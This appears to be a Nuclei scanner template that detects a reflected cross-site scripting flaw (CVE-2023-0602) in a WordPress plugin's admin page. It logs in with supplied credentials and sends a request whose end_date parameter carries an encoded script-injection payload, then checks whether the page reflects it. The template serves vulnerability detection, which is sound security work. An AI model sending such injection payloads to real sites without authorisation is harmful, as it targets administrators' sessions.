nuclei-templates/http/cves/2023/CVE-2023-0602.yaml

48 lines
1.9 KiB
YAML
Raw Permalink Normal View History

2023-10-17 07:20:28 +00:00
id: CVE-2023-0602
2023-10-17 07:20:28 +00:00
info:
name: Twittee Text Tweet <= 1.0.8 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
The Twittee Text Tweet WordPress plugin through 1.0.8 does not properly escape POST values which are printed back to the user inside one of the plugin's administrative page, which allows reflected XSS attacks targeting administrators to happen.
reference:
- https://wpscan.com/vulnerability/c357f93d-4f21-4cd9-9378-d97756c75255
- https://nvd.nist.gov/vuln/detail/CVE-2023-0602
- https://wordpress.org/plugins/twittee-text-tweet/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-0602
cwe-id: CWE-79
2024-05-31 19:23:20 +00:00
epss-score: 0.00071
epss-percentile: 0.30429
cpe: cpe:2.3:a:johnniejodelljr:twittee_text_tweet:*:*:*:*:*:wordpress:*:*
2023-10-17 07:20:28 +00:00
metadata:
verified: true
max-request: 2
vendor: johnniejodelljr
product: twittee_text_tweet
framework: wordpress
2024-01-14 09:21:50 +00:00
tags: cve2023,cve,wpscan,xss,wordpress,wp,wp-plugin,twittee-text-tweet,johnniejodelljr
2023-10-17 07:20:28 +00:00
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/admin.php?page=vxcf_leads&form_id=cf_5&status&tab=entries&search&order=asc&orderby=file-438&field&time&start_date&end_date=onobw%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3ez2u4g HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'contains(header_2, "text/html")'
2024-03-26 17:26:22 +00:00
- 'contains_all(body_2, "<script>alert(document.domain)</script>", "twittee")'
2023-10-17 07:20:28 +00:00
condition: and
# digest: 490a00463044022055eff03f7b91ce24bf430d5fbf23f913a168a32bf5a1496e975dfa16439e1f190220056c2da3cdd58f9d0da845fcbe25f11a4628f92ba076c2e00f56ed0331005d59:922c64590222798bb761d5b6d8e72950